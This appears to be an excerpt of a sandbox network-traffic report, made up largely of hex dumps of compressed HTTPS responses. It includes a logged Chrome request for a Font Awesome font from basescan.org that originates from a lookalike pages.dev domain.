                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: ad b7 5c d2 35 ea 52 c9 89 92 4f f3 c4 4b 9b f0 81 f3 0d c2 59 1b 35 2d 36 de a0 36 a2 d0 21 3c 67 28 84 5d c0 ae f6 87 63 9d e4 e1 da 12 c3 c3 71 95 bf 34 6e d4 9b c8 df 27 81 b8 59 f2 63 6c 5d 49 ef 39 9f 23 01 e5 5c 15 e5 2c f0 64 1f 1b 68 e4 d8 60 13 ac 6b fb 09 73 58 b2 43 74 ce f4 0f c0 01 9f 9d 32 02 50 0b 59 92 6a a9 22 f6 71 92 a6 51 f9 b0 9d e3 15 ba 81 78 6b d4 21 81 e7 db f9 b4 06 3b 0d 76 4a 76 ca 3e cc 45 ea e5 f7 5c a0 6e fe 52 0d b2 05 1b 0d ae e3 33 a6 26 e6 70 92 87 65 51 74 b9 10 67 fb d3 e0 5a c4 d5 1a 75 69 e2 f5 e8 8e 73 15 3b 71 95 6b 79 64 2b 02 e8 87 73 ba 51 8b c6 79 5d 73 50 8b ae 89 1d 7c e3 c9 0d 3b c0 bf 44 66 2b b3 ad 05 96 28 d9 28 d9 cc 43 63 f5 71 0f b5 56 92 41 f2 3d a8 8f 89 9a 69 0f 48 fa 89 1e 1d 3a bd 40 5c 5f f5 7e
                                                                                                                                                                                                                                              Data Ascii: \5ROKY5-66!<g(]cq4n'Ycl]I9#\,dh`ksXCt2PYj"qQxk!;vJv>E\nR3&peQtgZuis;qkyd+sQy]sP|;Df+((CcqVA=iH:@\_~
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 64 57 4d f5 9c d1 0e ff d6 93 8f c1 3e a8 09 9b 69 ba 2b 8d 85 f3 46 cb fc 6d 85 3b 24 dc 2c b3 9d a7 5c 47 a5 ff 4a 3e e9 e6 6f b2 5d e3 0e 1e 63 c8 fa 80 7d 1c 86 fa b7 c3 cc 76 8b d6 49 39 21 e8 6c 80 cf 8b 35 24 cb e4 7f d9 33 59 a6 39 9e f6 9f b3 69 5c 07 e2 1f c0 db 92 be db 97 68 97 68 6e 36 9d fa ff af c6 19 5c ad ce 59 16 c4 6f 33 0c 95 b7 8a 7b c8 a5 ac 3f b6 86 f3 49 58 fc 3f 8b e9 91 d6 40 15 2a f4 81 ce 09 84 73 0e 5b fd d6 8b cd 85 fc 55 c6 2a c2 a9 5b 01 20 1f 74 26 a5 a9 e3 d5 f1 4e 80 53 27 64 bc 95 fd 9a 73 8c 66 ea 53 9c ff c1 fe 52 de 88 b2 3c c1 09 fe a6 77 35 67 8e 67 98 e2 27 9c 4b 85 c7 1e 86 72 fb 4d 04 00 2b 00 58 00 20 1d 00 ac 00 31 cd c1 f2 ff 1d fa ff 4e 00 d2 c1 02 81 00 31 cd c1 1a 53 04 c0 7a c6 0a 10 00 67 a0 05 b4 86 36
                                                                                                                                                                                                                                              Data Ascii: dWM>i+Fm;$,\GJ>o]c}vI9!l5$3Y9i\hhn6\Yo3{?IX?@*s[U*[ t&NS'dsfSR<w5gg'KrM+X 1N1Szg6
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: f3 de 07 93 07 2b 04 1b 04 d7 07 37 06 b7 5d df 4b c1 bf 7e 31 bf a9 df cc 6f e7 b7 f7 87 f9 47 fc bb fe 23 3f e0 fb fe 4f ff b7 2f 7c e5 47 f9 ff 42 49 ae 56 58 28 67 a8 60 a8 68 a8 72 a8 7a a8 53 a8 27 27 3c 16 8f cd e3 f2 78 3c f9 f5 81 d3 bd 7d 36 5e 95 57 bb b4 0e 6f 7a 8f ae 9f 76 7f 3e 94 4f e5 33 3c 8b f8 52 be a2 91 8d 7c 2b df ce 77 f0 a3 fc 2a 7f ca 5f 73 87 bb d7 a5 5f 39 b7 b7 82 88 f8 22 81 48 2c 92 88 e4 d7 de f4 1e 26 72 88 9c df b1 02 a2 a8 28 23 2a 89 aa a2 8e a8 2b 9a 8a 56 a2 b5 e8 20 ba 8a 51 62 ba 98 75 dd 73 d9 c5 1b c5 81 f7 7c 5c 9c 15 57 c5 a3 b7 ff 28 1c f1 63 77 5a 11 29 a2 80 40 6c 48 08 e9 20 1b 94 80 b2 50 15 ea 43 23 68 0a cd 60 20 0c 83 b1 30 ee fa c0 4b 3f e3 9b 60 2b ec 81 93 8b 73 0d 6e c0 1d 78 0a 2f e1 03 04 80 23 c1
                                                                                                                                                                                                                                              Data Ascii: +7]K~1oG#?O/|GBIVX(g`hrzS''<x<}6^Wozv>O3<R|+w*_s_9"H,&r(#*+V Qbus|\W(cwZ)@lH PC#h` 0K?`+snx/#
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 98 01 60 92 00 a6 17 38 f7 83 73 fa 24 73 9b b9 00 ce 5e 7e 74 e0 e6 71 73 00 98 16 85 15 98 c7 0b d6 98 b1 60 ea 5d c8 f4 4d 26 38 63 b9 8f 33 63 c1 8c 3f 43 23 93 c1 7c ec bc 0e 66 34 98 91 e0 a4 bf e9 6d da 4e d3 0b 4c 0f 30 dd c0 74 71 32 c1 74 00 30 5b f9 2a 76 06 ad ba 4d e0 6c 77 b6 33 99 8d 8e 7c 24 e7 e3 77 e5 f4 01 d3 e8 6c e7 d9 27 02 db 81 ad c0 5a 60 31 d3 c7 e3 7e 26 af 65 3c 2b b7 ee 1b ed 73 9a 2d bc 95 05 2e 09 32 f0 09 28 41 49 4a 51 9a 90 88 24 31 65 48 91 a6 2c e5 28 4f 05 2a 52 89 ca 54 a1 2a d5 a8 4e 0d 6a 52 8b da d4 a1 2e f5 a8 4f 03 5a b8 7b 12 c5 13 c9 c4 9c c4 dc 8c 45 19 db 25 29 b1 94 91 f2 52 41 2a 4b 55 a9 26 b5 a5 be b4 94 56 d2 5a 7a cb 00 19 28 83 64 b0 0c 91 a1 32 4c 32 25 4b b2 65 94 8c 96 31 32 41 26 ca 24 99 2c d3 65
                                                                                                                                                                                                                                              Data Ascii: `8s$s^~tqs`]M&8c3c?C#|f4mNL0tq2t0[*vMlw3|$wl'Z`1~&e<+s-.2(AIJQ$1eH,(O*RT*NjR.OZ{E%)RA*KU&VZz(d2L2%Ke12A&$,e
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 47 2e 24 17 52 37 e4 22 72 11 ed bc e4 12 72 09 f5 65 e4 32 72 19 ed b7 e4 72 72 39 d5 22 e4 4a 72 25 83 2f c9 75 e4 3a aa 23 c9 f5 e4 7a aa d7 c9 0d e4 06 ea 63 c9 8d e4 46 ea e3 c8 4d e4 26 ea e3 c9 cd e4 66 ea a3 c9 2d e4 16 ea 13 c8 ad e4 56 ea 63 c8 6d e4 36 ea 13 c9 ed e4 76 ea 93 c8 1d e4 0e aa 6f c9 9d e4 4e aa 6f c9 7d e4 3e 86 ef 93 07 c8 03 d4 27 93 a7 c9 d3 d4 3b 92 67 c8 33 34 c7 90 97 c8 4b b4 cf 93 97 c9 cb 0c df 25 af 90 57 68 57 23 53 c8 14 aa a7 c8 57 e4 2b da 99 c8 d7 e4 6b 86 77 93 6f c8 37 0c 56 25 3f 91 9f 68 c7 92 3f c9 9f b4 4f 90 bf c8 5f b4 37 91 7f c8 3f 0c 5f 21 ff 93 ff 19 6c 46 81 12 36 d5 7d 94 d1 94 d1 cb 9e b1 94 b1 47 f6 38 ca 38 ea 69 29 0d a5 a1 d9 8f 32 a0 0c a8 5e a1 0c 29 43 86 9f 53 5a 4a 4b 7d 0d 65 3c 65 3c f5 8d
                                                                                                                                                                                                                                              Data Ascii: G.$R7"rre2rrr9"Jr%/u:#zcFM&f-Vcm6voNo}>';g34K%WhW#SW+kwo7V%?h?O_7?_!lF6}G88i)2^)CSZJK}e<e<
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: e2 0b e2 0b 3a 2f 4c 7c 49 7c 49 39 82 f8 8a f8 8a 72 1a f1 35 f1 13 e5 59 22 88 5f 29 af 12 bf 11 bf 51 df 27 7e 27 7e a7 8e 26 fe 20 fe a0 2e 41 fc 49 fc 4f 79 8b 44 56 ca 87 64 07 d9 41 c7 86 64 27 b2 0b e5 4b b2 2b d9 95 f2 3d d9 8d ec 4e f9 86 ec 49 f6 a2 7c 47 f6 26 7b d3 b1 0b d9 97 ec 4b 39 8e ec 47 f6 a3 1c 4f 0e 24 87 52 7e 20 87 91 c3 28 0b 91 c3 c9 e1 94 24 47 92 a3 29 8d 1c 43 8e a1 9c 4e 8e 25 27 50 7e 23 27 92 13 31 82 9c 44 4e a2 fc 45 4e 26 27 63 36 72 0a 39 9d f2 37 39 93 9c 8f f2 3f b9 00 b9 30 75 4e 72 31 72 71 6a 07 b9 24 b9 3c b5 33 b9 02 b9 02 b5 27 b9 22 b9 3a b5 17 b9 26 b9 2e 75 20 b9 1e b9 1e e6 24 d7 27 37 a2 0e 23 37 21 37 a7 8e 22 b7 24 b7 a3 8e 23 f7 23 0f a4 4e 21 8f 26 8f a1 ce 20 8f 23 4f a4 ce 22 4f 27 4f a7 63 79 f2 4c
                                                                                                                                                                                                                                              Data Ascii: :/L|I|I9r5Y"_)Q'~'~& .AIOyDVdAd'K+=NI|G&{K9GO$R~ ($G)CN%'P~#'1DNEN&'c6r979?0uNr1rqj$<3'":&.u $'7#7!7"$##N!& #O"O'OcyL
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: bf cd f4 9d 8c 3f 60 3c 80 e9 bb 18 0f 62 3c 82 e9 96 8c 47 31 9e c7 74 81 f1 7c c6 f3 59 ba c0 78 01 e3 35 4c 77 67 bc 8e f1 16 a6 87 30 de c6 f8 30 d3 a3 19 1f 65 7c 9c e9 99 8c 4f 30 3e c1 ec 91 8c 4f 32 3e c5 f4 1c c6 67 18 ff cf f4 3c 79 65 41 5e 59 60 b2 a2 74 a9 74 29 c3 5a d2 59 e9 2c c3 da d2 39 e9 1c c3 0a d2 41 3a 30 6c 22 5d 46 ba 0c 93 fd a4 cb 4a 97 65 b2 bf f4 35 d2 d7 30 39 40 fa 5a e9 6b 99 39 52 fa 36 e9 db 98 fd bc f4 bd d2 f7 62 33 e9 fb a4 ef 63 f6 1a e9 07 a5 1f 64 58 5d fa 61 e9 87 19 7e 22 fd 88 f4 23 0c df 93 7e 54 fa 51 86 1f 4b 3f 26 fd 18 c3 06 d2 8f 4b 3f ce b0 b1 f4 13 d2 4f 30 fc 5e fa 29 e9 a7 18 fe 21 fd b4 f4 d3 4c 97 95 7e 46 fa 19 86 bb a5 9f 95 7e 96 c5 0f 49 3f 27 fd 1c 93 77 4a 3f 2f fd 3c b3 3f 91 7e 41 fa 05 e6 36
                                                                                                                                                                                                                                              Data Ascii: ?`<b<G1t|Yx5Lwg00e|O0>O2>g<yeA^Y`tt)ZY,9A:0l"]FJe509@Zk9R6b3cdX]a~"#~TQK?&K?O0^)!L~F~I?'wJ?/<?~A6


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              76192.168.2.549811104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC708OUTGET /assets/vendor/font-awesome/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC937INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff2
                                                                                                                                                                                                                                              Content-Length: 118148
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NIPfNU1iBzooiBqb%2FiSeoHOphhhXaJqXsqvXf%2BDcbsNY3D5U1e7FD75srVExK8dTV5rVYUgsF3IUttE96IUucadiZyJ6sThXTJ8zj4CZfYqTAvywntnQmnO02rtiIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Set-Cookie: __cflb=0H28vtoAdHDLg8sTeQQMiRCFaG8m9Kq4q6Sxu5Dyy3r; SameSite=None; Secure; path=/; expires=Sun, 29-Sep-24 00:16:05 GMT; HttpOnly
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d26a0f4204-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC432INData Raw: 77 4f 46 32 00 01 00 00 00 01 cd 84 00 0a 00 00 00 03 1b 15 00 01 cd 38 03 05 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 91 10 00 a5 42 ca 8b e4 18 cb 91 14 05 88 1d 07 20 25 8a 8d 71 cb 00 05 e7 01 00 a0 b5 fe 3c 28 23 b2 4e db 03 a0 aa aa 7a 4b 08 ee 5e b5 ff 00 e1 a7 5f 7e fb c3 9f fe f2 b7 7f fc eb 3f ff fb cb c0 d8 1d 10 cb 76 5c cf 37 fc d7 ef 57 9e be 33 b3 00 f8 37 c0 2e 96 5e 98 65 1c 81 90 2f 60 c3 c2 60 f9 a8 ad c8 2e 3f e5 03 e8 e2 16 a1 97 70 6a 8a b3 b5 7c 37 40 37 03 e4 0c 89 3d 00 62 97 bc 7f b6 a4 73 9c 61 78 80 fa f3 df 73 eb 60 f2 41 a0 04 57 80 f3 94 62 95 a9 44 10 e4 3d fe 6c db 0f f2 04 f8 24 d8 d9 4d 5e 5a ff f4 4e ed ff 9c 11 8c 46 9a 91 2d 0b c6 10 b0 2d 5b 4a 03 8d 27 8a a5 26 25
                                                                                                                                                                                                                                              Data Ascii: wOF286$ `B %q<(#NzK^_~?v\7W37.^e/``.?pj|7@7=bsaxs`AWbD=l$M^ZNF--[J'&%
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 1c a5 88 b9 f6 08 f8 11 62 1f 7f 11 a2 fb f3 fc fa 77 fe 59 6b ed bd b6 1e f1 11 bb 33 f7 ce b9 fa de 9c d1 27 1a 02 11 34 68 12 42 09 1e a0 1a 52 a8 d1 be aa f9 ab 51 37 a0 75 fe f7 9a de f7 7f 34 57 ff 75 ab aa ab da aa 45 d3 9d 4e 3a 4d a4 81 10 20 24 21 30 f8 88 c2 88 ee 81 dd 9d 9d 59 31 e6 a9 b2 4f 4d 39 e7 cd fc 3f cf 7d 9e 98 05 82 02 56 ae 1e 4c 2f 44 cd 0e 4f 7c 0b 62 72 55 15 15 59 e0 2a 44 16 f5 85 ba a0 91 c5 fd a0 8e 57 28 0a 67 d6 3b 01 a2 4d f2 20 1f 18 8e 74 4f 00 06 99 cf 72 59 0a f3 03 30 84 d8 ff 7f df 4a fb 7c 14 80 2f 94 ac 3f 2a 47 48 bb c1 d1 d2 94 d6 68 bb f7 3e f7 19 e7 de f7 d6 9a fb 22 d2 78 11 99 c6 8b cc 32 5e 66 95 f1 22 b3 8c 97 55 f5 22 33 89 89 4c 14 f9 b3 0a e8 5e 05 34 ba 57 01 8d bf 56 81 ad 00 90 9c 45 70 46 bf a8 6a
                                                                                                                                                                                                                                              Data Ascii: bwYk3'4hBRQ7u4WuEN:M $!0Y1OM9?}VL/DO|brUY*DW(g;M tOrY0J|/?*GHh>"x2^f"U"3L^4WVEpFj
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 74 87 1e d0 13 7a 41 6f e8 03 7d a1 1f f4 87 01 30 10 06 c1 60 18 02 43 61 18 0c 87 11 30 12 46 c1 68 18 03 63 61 1c 8c 87 09 f9 4a e4 6b 99 af 55 be d6 f9 da e6 5b 65 86 9b 69 4d dd cc 6a d6 37 5b 98 6d cd 99 e6 dc f8 df 09 4f 13 fd 89 dd 12 df 25 c9 a4 8a 49 0d 92 d6 25 6d 48 da 9a 5c 22 79 58 f2 e1 e4 3b 56 8c 15 67 15 b2 8a 59 55 ac ea 56 27 ab a7 dd d7 ee 6f 4f b7 17 da cb ed 0d f6 2b 3b 1e d3 62 7e 2c 88 65 b1 32 b6 c6 0e d8 07 fb e3 00 1c 82 c3 71 04 8e c2 29 38 0d 67 e2 22 5c 89 6b 71 03 6e c6 fd 78 06 2f e3 43 7c 83 7f e2 7f e8 e0 77 f2 52 24 09 ca 40 c5 a9 24 95 a3 aa d4 88 ba 50 77 1a 48 43 68 18 4d a1 e9 34 9f 96 d3 4a 5a 45 eb 68 03 ed a6 03 74 90 0e d3 49 3a 4b b7 e9 3d 7d 26 93 3b f1 68 9e cc 06 cf e2 b9 bc 84 d7 f0 7a de c2 3b f9 38 5f e2
                                                                                                                                                                                                                                              Data Ascii: tzAo}0`Ca0FhcaJkU[eiMj7[mO%I%mH\"yX;VgYUV'oO+;b~,e2q)8g"\kqnx/C|wR$@$PwHChM4JZEhtI:K=}&;hz;8_
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 61 31 e5 d7 cf b0 84 f2 5b 06 58 4a 45 67 2a ba e0 2b ae d8 1c 06 58 41 c5 03 54 3c 84 a9 ae 8a 57 a9 78 0d 3f 5d 85 0c 85 2c 5e ba 0a b5 29 d4 c3 49 5c 68 17 0f b0 85 42 07 0a 9d d6 bf ab d0 8f c2 80 b5 ee 2a 0c a6 30 64 3d e3 c2 fc 7b 86 bd 14 96 cd b0 8f e2 aa 19 32 14 d7 8c 20 4d f1 08 c5 a3 d8 4f f1 02 9a e1 20 c5 cb f6 e8 10 c5 6b 29 5e 8f c3 14 3f a4 f8 09 8e 51 2c a1 19 ce 26 56 9b e1 1c 62 eb 19 1a 11 db 7e e5 93 ce 38 f6 0c 23 38 97 d8 8f d8 1f e7 11 67 d0 0c a7 11 e7 ce 70 01 71 e5 08 c9 73 c4 55 c4 35 b8 90 b8 96 90 1f 7d 1d 71 23 2e 21 6e 26 6e c1 15 c4 ad 61 1f 5d 49 dc 46 dc 8e ab 88 7b 88 07 71 0d f1 30 f1 08 6e 22 1e a7 11 dc 42 3c 97 78 21 6e 25 5e 41 33 dc 45 bc 66 04 77 13 af 23 5e 8f 7b 88 37 d1 0d 74 1f f1 16 e2 7d b8 9f f8 04 f1 69
                                                                                                                                                                                                                                              Data Ascii: a1[XJEg*+XAT<Wx?],^)I\hB*0d={2 MO k)^?Q,&Vb~8#8gpqsU5}q#.!n&na]IF{q0n"B<x!n%^A3Efw#^{7t}i
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: e1 27 5c 4a d1 7e cc d1 6c 47 b8 94 12 b6 3f b5 cd 8b 61 a6 c4 7e eb 24 eb 98 61 18 3e 16 3e 86 a5 66 3b e2 f4 45 97 52 cc 71 41 ed 64 5d 4b ac 6f cc 45 97 5a 44 68 a9 9c 4c 26 93 f7 18 c7 b0 17 53 dc c5 29 bc 11 c0 df 91 4a 45 61 a8 76 b2 81 8a d4 c2 ad a5 26 35 d3 54 25 14 3d 59 24 a5 da c1 b7 f0 6b 52 93 86 2a a0 66 dc 4d 93 e1 50 0d e2 81 8a 95 5a e4 85 24 4d 8a b9 6e c9 a8 c0 e0 e3 25 69 aa 94 1a c8 dc 90 22 2f 86 6a b7 c8 b3 d2 65 8c 68 38 10 d4 22 9a 63 bb db 83 95 25 d4 74 e2 d4 95 86 91 ac 07 91 cb 4d d3 ab 35 82 3a 86 ff 17 41 44 bf d1 0c b9 a1 1b 26 77 84 17 86 55 d5 6a 10 a2 69 76 43 69 51 bd 1e 44 42 50 c3 f7 1b 81 64 cc c5 29 63 6e 0f 2d cd b1 5d 41 29 b1 a8 e0 d5 8a 61 d2 0a 47 c3 b2 b8 db 6c b5 97 7d df b6 b4 8e cb 18 63 6e ac 51 ca 4c ce
                                                                                                                                                                                                                                              Data Ascii: '\J~lG?a~$a>>f;ERqAd]KoEZDhL&S)JEav&5T%=Y$kR*fMPZ$Mn%i"/jeh8"c%tM5:AD&wUjivCiQDBPd)cn-]A)aGl}cnQL
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: aa cb 3a e7 9c 1a ba ce f5 c6 29 38 b5 e3 87 95 57 c7 f5 b0 c5 37 16 33 9c e0 47 60 0f c0 cf 53 85 f3 6e a0 26 d5 94 99 e5 56 f1 3f 51 61 d7 e2 17 0c 5d e7 82 73 73 42 99 ed cd c6 c9 b6 67 d4 b6 5b 46 f8 c2 f7 e1 4b 05 e7 a6 a1 eb 7c fe 9f d5 4a e5 d2 84 6f 73 09 08 76 fe 35 8c a9 9e 8f ee 75 b4 eb dd 34 aa b7 75 db 1d b3 91 ca 73 1f 0f 5f 3a a0 7f 9a 17 ae d6 1b c2 f8 b9 ba d3 78 e1 80 77 57 6c 46 3a 78 54 27 cf 11 be f8 cf cf ad 56 9a ec c7 59 e1 43 1c 5e f9 52 4e 3e fa c3 10 c3 b9 f7 97 a4 ca a4 41 18 84 03 35 50 b9 98 4f d2 24 2d 64 90 a1 e0 00 ea ec a7 56 e4 d9 8e 8c 64 14 fe 23 43 b4 1d c1 d9 5b fa 24 61 7f 4b d6 37 46 e7 eb 42 44 b2 d1 90 91 10 af ae 8c df e7 08 ce 18 a2 fd b9 8d 3d 44 24 09 bc e6 c2 e6 96 71 db bf 34 a3 33 76 44 cd 0f e4 ea e3 f0
                                                                                                                                                                                                                                              Data Ascii: :)8W73G`Sn&V?Qa]ssBg[FK|Josv5u4us_:xwWlF:xT'VYC^RN>A5PO$-dVd#C[$aK7FBD=D$q43vD
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 64 6b 38 56 85 09 96 b0 03 d0 af 5d 9b 41 ea 91 f3 fd 1d 71 df ef 0d e4 99 1d 2c ad 9f b1 80 96 27 80 30 9d 4e a7 13 e9 26 f5 76 37 df de 3a 8d 9b ad 8a 2d b7 66 5e f1 2f d9 51 3d 33 28 96 c2 18 45 e3 d6 4d 5b 63 82 73 b5 75 ce 96 a6 f3 bd 71 db 59 07 c0 fa cc ac a7 1c 73 43 ed e6 6c e9 b7 7a ed 47 b1 ed 32 36 f2 72 65 31 cc a6 d0 12 2d 4c b3 31 3e c6 56 a3 a8 c0 b8 69 5d c3 0b 39 53 ae 9f de 9f 2a 3a ec 3d d1 bb b5 40 e0 41 05 16 cc b6 b9 b0 df 77 b2 1f dc 1a 72 c3 d3 16 17 8e 43 34 eb 87 9f c3 ef 05 8a 8e 5d 6e ff 4c 4f 5a f3 e3 57 77 69 f0 f7 1d 4c 1d 8d 58 16 17 ce ef fe 48 ee dc d1 8e 56 6a 55 5b bd 55 82 4e 37 4d 86 63 d0 37 2a 87 48 7a a2 b8 34 3b 2f fb 02 37 10 e4 86 fd 58 55 a2 21 65 ed 2b f2 2a 5d b7 79 8f 8a bb 69 aa da 2f 92 17 32 72 3f fe 71
                                                                                                                                                                                                                                              Data Ascii: dk8V]Aq,'0N&v7:-f^/Q=3(EM[csuqYsClzG26re1-L1>Vi]9S*:=@AwrC4]nLOZWwiLXHVjU[UN7Mc7*Hz4;/7XU!e+*]yi/2r?q
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: df 82 0c 64 90 45 d9 ce 73 24 91 8c ca 14 c0 70 39 83 64 6b 77 5b a4 dd 9b 94 21 e2 62 70 1d 5e cd 86 84 ec f2 8f e3 ee aa 27 70 cc 84 2b 02 9d 7b 55 bf 21 05 62 1c 86 66 43 12 44 c4 8d 2f 4d b0 de dc 6e 36 2d bb 5a a9 6d 52 6b a9 75 76 ab d9 d2 b0 5a c9 a8 ed a0 e3 b8 2e 43 b4 75 5d b3 ac 24 a4 48 50 d7 50 38 a2 ea 31 1d 09 b6 3b 45 71 f8 f0 c1 85 0a b5 98 8e a3 ad c0 ab d1 f5 36 ae 46 51 d0 8a 23 82 61 b7 db 45 07 09 21 04 11 1d 24 91 ac 5a 86 4e 1a 5b 5b 49 1f b5 a5 a5 55 ad e6 13 74 6c 03 4d 83 5a 16 41 5b 27 64 65 c5 6f 3a 61 c0 08 41 e6 88 46 23 a9 56 2a f4 b0 28 da 1d 24 7b a7 ee 1f c6 b1 85 c0 a0 bd 98 91 35 2c 81 83 0f 3d b8 19 1e 83 2b 30 81 37 c3 bb 00 78 55 6a f8 6b b4 2c ce 86 2a 2e 72 bb 15 ab 90 2d 72 85 1c 86 c3 ac 05 23 6d e3 bd ed 48 9a
                                                                                                                                                                                                                                              Data Ascii: dEs$p9dkw[!bp^'p+{U!bfCD/Mn6-ZmRkuvZ.Cu]$HPP81;Eq6FQ#aE!$ZN[[IUtlMZA['deo:aAF#V*(${5,=+07xUjk,*.r-r#mH
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: e7 b0 6f 62 ef 65 0c fb 75 59 cd aa 59 3d ab 63 d3 98 59 3d d3 23 d0 c8 2d 95 d5 bc 9e ab d9 f2 ea d2 e1 b5 d2 c4 a6 ac e6 5a 5b cc 30 ed db ba 5e 5c 9d 4b eb 66 dd 68 5c c0 19 df 5c be ac 67 ab b9 69 48 b5 17 ac 9b f5 6a a6 ad 2c 17 79 a6 cd ae 3a 45 b3 ae c1 8c 2f 2b f1 15 42 84 11 c1 75 f5 5b 60 59 8e 6b 59 78 21 97 51 9f 08 f0 92 d9 30 93 bb dc 21 0e a5 b4 56 12 38 4e 3c 38 e1 05 9e 67 c5 da 71 68 ac b5 63 17 56 9e ea 2c 1b 1c e7 79 14 86 44 49 32 9a b6 52 17 61 18 3b 52 88 cc 73 5d e2 ed 62 91 3a 4e e4 3a 51 2e 24 1e 82 15 68 8b 9c 00 cf e5 00 1c c7 3a bc 73 c4 d7 eb 9b 6f 5e 37 a2 b4 ad 11 e0 83 8e 57 95 4f c4 b9 a3 76 b6 4f 9c d8 da e2 fb f8 09 91 08 21 f8 30 d5 aa 53 1c 08 69 f7 6b ad c6 a3 31 ff ab c0 b5 c3 b0 b7 91 e7 dc f3 68 07 b6 0d ad 54 e6
                                                                                                                                                                                                                                              Data Ascii: obeuYY=cY=#-Z[0^\Kfh\\giHj,y:E/+Bu[`YkYx!Q0!V8N<8gqhcV,yDI2Ra;Rs]b:N:Q.$h:so^7WOvO!0Sik1hT
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: db a1 92 f8 f7 33 99 07 82 0f 58 da 3a f3 e0 ee e6 ff fb e8 a7 70 0d d7 7c c2 71 59 df 4f 65 74 28 2e 32 c4 92 5e 2d 30 d7 16 62 b3 34 5c b6 e7 6f 81 6b 17 9a 41 7f 6e e6 f3 6a a2 64 bb b3 b3 bb 6c e7 79 18 04 61 91 b7 8b 20 78 2e b9 db a3 8d bf ab 7f 64 7f 73 b3 15 7b 5e 5d 2f cc de 6e 91 ab e7 6b 4b a7 69 bb c8 5a da b2 ac 56 ab 83 07 5d 77 39 48 c1 18 31 76 64 43 b5 02 96 79 aa 75 d2 14 a2 49 7c 1a ab 6a 59 65 66 89 6b 87 07 df f8 f4 d3 4f 3f fd f4 5f fe e7 7f fe e7 7f 3e f9 e4 af 3d c9 8b 18 c0 0e e8 0a 5e c5 4e b2 17 b5 11 14 08 08 89 ea 6e 1a b3 bf da 5f d1 5b ed cc f6 0a 0b 8a 92 4e 18 85 90 a6 5d f5 ac 6e ca 4a ef 46 44 50 56 e4 99 aa 28 79 dd 5a 9b b4 48 97 7c c4 78 d1 e8 a7 6f c0 78 df 67 3e f3 19 22 00 e2 73 79 ab 65 05 f1 f5 a7 cf 1e b4 93 2c
                                                                                                                                                                                                                                              Data Ascii: 3X:p|qYOet(.2^-0b4\okAnjdlya x.ds{^]/nkKiZV]w9H1vdCyuI|jYefkO?_>=^Nn_[N]nJFDPV(yZH|xoxg>"sye,


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
